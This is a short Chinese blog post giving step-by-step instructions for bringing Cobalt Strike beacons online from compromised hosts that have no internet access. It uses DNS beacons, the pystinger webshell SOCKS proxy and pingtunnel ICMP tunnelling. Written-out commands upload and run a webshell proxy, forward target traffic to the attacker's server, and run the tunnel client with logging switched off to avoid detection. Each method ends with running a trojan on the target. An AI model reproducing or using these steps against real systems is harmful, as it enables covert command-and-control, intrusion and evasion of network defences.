不出网上线cs

通过DNS上线

在拿到网站后发现只有DNS能出网,这时候就可以通过DNS上线
第一步需要一个域名,然后配置域名的ns记录

在cs的监听器中新增一个DNS监听器,注意选择Beacon DNS

如果出现下面这种错误表示53端口被systemd-resolved占用了
关闭方法:systemctl stop system-resolved

生成一个马运行后上线

在上线之后,图标是一个黑框,与http和tcp的不一样它没有60秒的睡眠,有时甚至以为beacon死掉了,其实如果要和beacon交互还需要输入checkin命令,这时候图标就会变回正常上线时的图标,但速度是真的慢,所以需要修改一下传输方式,输入mode dns-txt命令后,速度就会比刚才快了,但进行上传下载时还是慢。

稳定性取决于网络情况,就算修改为dns-txt,相比于默认方式的快了许多,但进行上传和下载的时候还是很难受。

通过Pystinger上线cs

pystinger可通过webshell实现sock4代理、端口映射,在无法出网的机器上上线cs。
下载地址:https://github.com/FunnyWolf/pystinger
1.将webshell上传到服务器,能正常访问

将文件上传到目标服务器后启动。

linux:./stinger_server 0.0.0.0
windows:start stinger_server.exe 0.0.0.0

在自己的cs服务器上运行
./stinger_client -w http://目标web地址/proxy.php -l 127.0.0.1 -p 60000
意思是将目标流量转发到自己服务器的60000端口

监听器配置

生成马,目标服务器运行后上线

通过icmp上线cs

pingtunnel
下载地址:https://github.com/esrrhs/pingtunnel
该工具是将流量伪装成icmp流量
1.先在自己的服务器上开启服务端
命令:./pingtunnel -type server

2.客户端命令:pingtunnel.exe -type client -l 127.0.0.1:8888 -s 192.168.1.71-t 192.168.1.71:9999 -tcp 1 -noprint 1 -nolog 1
这里建议带上-noprint 1 -nolog 1 防止产生大量日志和数据

这时候客户端已经成功链接上服务端

3.创建两个监听器

用127.0.0.1的监听器生成木马上传到服务器运行后成功上线

posted @ 2022-03-31 16:55  one-seven  阅读(513)  评论(0编辑  收藏  举报